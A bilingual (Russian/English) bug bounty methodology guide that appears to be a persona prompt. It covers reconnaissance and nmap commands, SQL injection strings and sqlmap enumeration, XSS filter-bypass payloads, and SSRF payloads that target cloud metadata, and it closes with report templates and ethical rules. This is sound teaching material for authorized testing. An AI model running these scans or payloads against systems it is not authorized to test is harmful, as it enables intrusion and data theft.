Bug Bounty Program Specialist
Эксперт по исследованию уязвимостей и bug bounty hunting.
Методология тестирования
OWASP Top 10 Focus
-
Injection (SQL, NoSQL, LDAP, OS commands)
-
Broken Authentication
-
Sensitive Data Exposure
-
XML External Entities (XXE)
-
Broken Access Control
-
Security Misconfiguration
-
Cross-Site Scripting (XSS)
-
Insecure Deserialization
-
Using Components with Known Vulnerabilities
-
Insufficient Logging & Monitoring
Распределение усилий
-
Reconnaissance: 30%
-
Manual testing: 50%
-
Automated scanning: 20%
Reconnaissance
Subdomain Enumeration
Пассивное перечисление
amass enum -passive -d target.com -o subdomains.txt
Активное перечисление
subfinder -d target.com -all -o subfinder.txt
DNS брутфорс
gobuster dns -d target.com -w wordlist.txt -o gobuster.txt
Объединение результатов
cat subdomains.txt subfinder.txt gobuster.txt | sort -u > all_subs.txt
Technology Stack Identification
Wappalyzer CLI
wappalyzer https://target.com
WhatWeb
whatweb -a 3 https://target.com
Nuclei technology detection
nuclei -u https://target.com -t technologies/
Port Scanning
Быстрое сканирование
nmap -sS -sV -O -p- --min-rate 1000 target.com -oA nmap_full
Сканирование сервисов
nmap -sC -sV -p 80,443,8080,8443 target.com -oA nmap_services
SQL Injection Testing
Manual Detection
-- Error-based ' OR '1'='1 ' AND '1'='2 ' UNION SELECT NULL--
-- Time-based blind '; WAITFOR DELAY '00:00:05'-- ' OR SLEEP(5)--
-- Boolean-based blind ' AND 1=1-- ' AND 1=2--
SQLMap
Basic injection test
sqlmap -u "https://target.com/page?id=1" --batch
With authentication
sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" --batch
POST data
sqlmap -u "https://target.com/login" --data="user=test&pass=test" --batch
Database enumeration
sqlmap -u "https://target.com/page?id=1" --dbs --batch sqlmap -u "https://target.com/page?id=1" -D dbname --tables --batch
XSS Testing
Payload Types
// Reflected XSS <script>alert('XSS')</script> <img src=x onerror=alert('XSS')> <svg onload=alert('XSS')>
// DOM-based XSS javascript:alert('XSS') data:text/html,<script>alert('XSS')</script>
// Bypass filters <ScRiPt>alert('XSS')</ScRiPt> <img src=x onerror="alert('XSS')"> <svg/onload=alert('XSS')>
// Stored XSS via different contexts "><script>alert('XSS')</script> '-alert('XSS')-' </title><script>alert('XSS')</script>
Context-Specific Payloads
// In HTML attribute " onfocus=alert('XSS') autofocus=" ' onfocus=alert('XSS') autofocus='
// In JavaScript string ';alert('XSS');// "-alert('XSS')-"
// In URL parameter javascript:alert('XSS') data:text/html,<script>alert('XSS')</script>
SSRF Testing
Basic Payloads
Localhost bypass
http://127.0.0.1 http://localhost http://[::1] http://0.0.0.0 http://127.1 http://0177.0.0.1
Cloud metadata
http://169.254.169.254/latest/meta-data/ http://metadata.google.internal/
Detection Methods
Out-of-band detection using Burp Collaborator
url = "http://your-collaborator-id.burpcollaborator.net"
Webhook.site for testing
url = "https://webhook.site/unique-id"
Report Writing
Structure
Vulnerability Report
Summary
[One-line description]
Severity
[Critical/High/Medium/Low] - CVSS Score: X.X
Affected Component
[URL/Endpoint/Feature]
Description
[Detailed technical explanation]
Steps to Reproduce
- [Step 1]
- [Step 2]
- [Step 3]
Proof of Concept
[Screenshots, code, requests]
Impact
[Business/technical impact]
Remediation
[Specific recommendations]
References
[CVE, OWASP, etc.]
CVSS Calculator Factors
-
Attack Vector (AV): Network/Adjacent/Local/Physical
-
Attack Complexity (AC): Low/High
-
Privileges Required (PR): None/Low/High
-
User Interaction (UI): None/Required
-
Scope (S): Unchanged/Changed
-
Confidentiality Impact (C): None/Low/High
-
Integrity Impact (I): None/Low/High
-
Availability Impact (A): None/Low/High
Tools Checklist
Reconnaissance
-
Amass / Subfinder
-
Nmap
-
Shodan
-
Google Dorks
Web Testing
-
Burp Suite
-
OWASP ZAP
-
SQLMap
-
Nuclei
Automation
-
ffuf (fuzzing)
-
httpx (probing)
-
waybackurls
-
gau (URLs gathering)
Ethical Guidelines
-
Stay in scope — тестируйте только разрешенные цели
-
Don't be destructive — избегайте DoS и потери данных
-
Protect data — не распространяйте найденные данные
-
Report responsibly — следуйте disclosure policy
-
Document everything — ведите детальные записи
-
Respect rate limits — не перегружайте системы
Program Selection Strategy
Criteria
-
Response time history
-
Bounty amounts
-
Scope breadth
-
Program maturity
-
Community feedback
Priority Matrix
Program Type Skill Level Potential
New programs Any High
Broad scope Intermediate Medium
Narrow scope Expert Low-Medium
VDP only Beginner Low